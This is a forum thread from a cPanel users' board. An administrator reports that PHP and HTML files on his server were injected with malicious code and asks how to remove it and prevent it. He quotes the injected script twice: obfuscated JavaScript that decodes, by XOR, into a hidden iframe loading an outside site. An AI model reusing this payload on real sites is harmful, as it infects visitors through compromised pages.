The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

javascript injection

Discussion in 'General Discussion' started by madan.cpanelnet, Mar 5, 2007.

  1. madan.cpanelnet

    madan.cpanelnet Well-Known Member

    Joined:
    Apr 1, 2006
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    INDIA
    Hello,

    Most of the sites are infected with malicious javascript code.



    <div id="testws35fdgh"></div>
    <script language="JavaScript">
    var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b";
    sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
    dst = "";
    for(i = 0; i < sr.length; i++) {
    var d = parseInt(sr.charCodeAt(i) ^ 85);
    dst = dst + String.fromCharCode(d);
    }
    document.getElementById("testws35fdgh").innerHTML = dst;
    </script>'>





    Please advise a script to get rid of this code.
     
  2. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Are these the source pages of the actual files (viewed on the server and not in the browser?)

    Your server sounds like it is the result of a recent defacement where the attacker is inserting malicious code onto your users pages

    I suggest having your server secured immediately and the pages cleaned up.
     
  3. madan.cpanelnet

    madan.cpanelnet Well-Known Member

    Joined:
    Apr 1, 2006
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    INDIA
    These are injected into every possible file on the server inside home dir... mainly in php and html files...


    <div id="testws35fdgh"></div>
    <script language="JavaScript">
    var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b";
    sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+ var10+var11+var12;
    dst = "";
    for(i = 0; i < sr.length; i++) {
    var d = parseInt(sr.charCodeAt(i) ^ 85);
    dst = dst + String.fromCharCode(d);
    }
    document.getElementById("testws35fdgh").innerHTML = dst;
    </script>'>
     
  4. madan.cpanelnet

    madan.cpanelnet Well-Known Member

    Joined:
    Apr 1, 2006
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    INDIA
    Hello,

    Searching for more information online on javascript injection I found that it was more due to insecure coding of webpages rather than server-side security ( like ssh logins etc )....


    Please advise the best practices to prevent this kind of iframe/jscript injections?


    Thanks
     
Loading...
Similar Threads - javascript injection
  1. sp3ctre69
    Replies:
    2
    Views:
    363

Share This Page